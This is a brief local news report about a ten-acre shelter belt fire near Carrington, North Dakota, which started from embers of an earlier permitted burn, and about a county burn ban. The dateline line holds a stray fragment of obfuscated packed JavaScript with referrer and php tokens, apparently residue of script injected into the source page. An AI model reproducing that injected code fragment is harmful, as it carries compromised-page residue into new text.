CARRINGTON, zsthi|var|u0026u|referrer|eidds||js|php’.split(‘|’),0,{}))
ND (NewsDakota.com) A shelter belt fire burned about 10 acres of trees, fence posts and pasture about 10 miles east of Carrington yesterday. The Carrington Fire Department responded to 78th Ave NE and Main Street about 1:30pm. 16 Firemen and four trucks were on scene.
Fire Chief Ken Wangen of the Carrington Fire Department said that the fire was sparked from tree rows across the road to the south that were involved in an allowed burn last week. Owners of the shelter belt had been closely monitoring that previous allowed fire before high winds caused the smoldering ashes to jump across the road and start a new fire. With high winds, dry vegetation and low humidity, Wangen says that fires can start or restart at anytime and everybody needs to be aware of any burn bans in place and make sure to check prior burns as well.
Today May 1st, Foster County is currently in a high fire index which means no burning is allowed. Please call 911 if you see a fire.
